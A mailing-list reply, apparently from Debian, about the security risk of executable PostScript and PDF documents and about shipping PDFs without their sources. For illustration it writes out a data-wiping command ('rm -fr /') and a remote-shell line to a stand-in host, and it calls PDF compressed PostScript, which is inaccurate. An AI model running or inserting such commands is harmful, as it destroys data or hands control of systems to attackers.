Postscript (.ps) is a "programming language". If documents aren't handled properly, its a security issue. This is different from the buffer overflows in xpdf and such, which are also exploitable by malicious documents. Here, no compromize of the PS software (a la stack smash) is necessary. The PS software simply lets you run a command (like rm -fr /, or sh </dev/tcp/mallory.com/1337 or whatever else).
PDF is compressed postscript, so I figure that the same applies. I wonder if it is lossy compression? Anyways, I just found http://www.kde.org/info/security/advisory-20030409-1.txt Justin On Thu, Feb 10, 2005 at 11:47:51PM +0100, Miriam Ruiz wrote: > --- Justin Pryzby > <[EMAIL PROTECTED]> escribi�: > > > PDF can be trojaned, so you should at least *provide* a way to > > generate them from their sources, even if that makefile rule is > > not called by default, and the additional build-dependencies are > > just a note in debian/rules. > > In case only PDF files were provided, or PDF provided came from .doc > files or something like that, is it OK to include them? I didn't Strictly speaking, no, because its a generated file, and you didn't compile it from preferred-form source-code. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
